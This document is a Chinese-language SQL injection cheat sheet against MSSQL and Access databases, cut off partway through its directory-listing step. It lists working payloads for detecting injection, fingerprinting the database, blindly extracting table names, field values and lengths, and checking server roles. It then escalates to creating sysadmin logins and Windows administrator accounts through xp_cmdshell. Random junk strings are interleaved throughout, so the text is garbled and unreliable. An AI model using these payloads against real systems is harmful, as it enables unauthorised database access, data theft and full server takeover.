1.判断是否有注入;and 1=1 ;and 1=2 /bg8oB4
2.初步判断是否是mssql ;and user>0 3fpX
9;.dNdg>
3.注入参数是字符'and [查询条件] and ''=' x<imMJ
d+=;sJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' y![h
NmK%k jCx
5.判断数据库系统 x'}{^'}/
m`n51i{U
;and (select count(*) from sysobjects)>0 mssql 0\u_\%[
WpRi+NC}ln
;and (select count(*) from msysobjects)>0 access CKj3-rcF(
A*W QdY
IhUuL0
UGl}=hwKkG
6.猜数据库 ;and (select Count(*) from [数据库名])>0 E|#'u^`yv
'tF<7\!
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 !! #\P7P
8iq~ha$]|
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 jt?R
a1Z
nLYyS#
9.(1)猜字段的ascii值(access) =n%?oLg^
^fH]Rlx
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]kc]YO7i%R
{d=y9Jb^
(2)猜字段的ascii值(mssql) V5R``Tp
_M{m6k(h
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 R(ay&f%E
obUh+9K
10.测试权限结构(mssql) ?zxKk(J
k5W5 9tz
uPb9j;Q?
N/]TZu~k z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
RtK/bUa
VM|8HR7U
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >[ywrB ?T
PLwa!j
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?DM-C5$
fFMG9]*
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <[b\V+M
350 y6pVh
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0s=GM|y
wMei`svY
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .3oFSc`q
LTG/gif[u
;and 1=(select IS_MEMBER('db_owner'));-- H~&9xtuHN
BYP,}yzA
tlG&PVvr
;v#~o*
11.添加mssql和系统的帐户 RQv`D&u_
Onby=Y
o6
;exec master.dbo.sp_addlogin username;-- P6;L\9=H<
;exec master.dbo.sp_password null,username,password;-- luAhyEp
{P(IA2J'S
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- zaR~ fO
BwrMRMq"
;exec master.dbo.xp_cmdshell 'net user username password [K%Jt
[JsQ/|=z
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kVZ>Dc2M
uflp4_D
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2=u5N[*
v-4eN1OS
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t~gnai
ZJ u\
O3B\K <l
'^}l|(
12.(1)遍历目录 $:F] O$A
*m2J$9q
;create table dirs(paths varchar(100), id int) F71.%p7C8"
Bglh}_X
;insert dirs exec master.dbo.xp_dirtree 'c:\' ytr~} M%
<